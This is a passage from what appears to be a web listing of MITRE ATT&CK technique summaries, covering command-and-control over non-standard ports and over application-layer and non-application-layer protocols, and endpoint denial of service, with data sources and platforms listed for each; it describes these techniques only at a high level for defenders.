Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposesand to support other malicious activities, including distraction, hacktivism, and extortion.
Tactics:	Impact
Data Sources:	Netflow/Enclave netflow, Network device logs, Network intrusion detection system, Network protocol analysis, SSL/TLS inspection, Web application firewall logs, Web logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre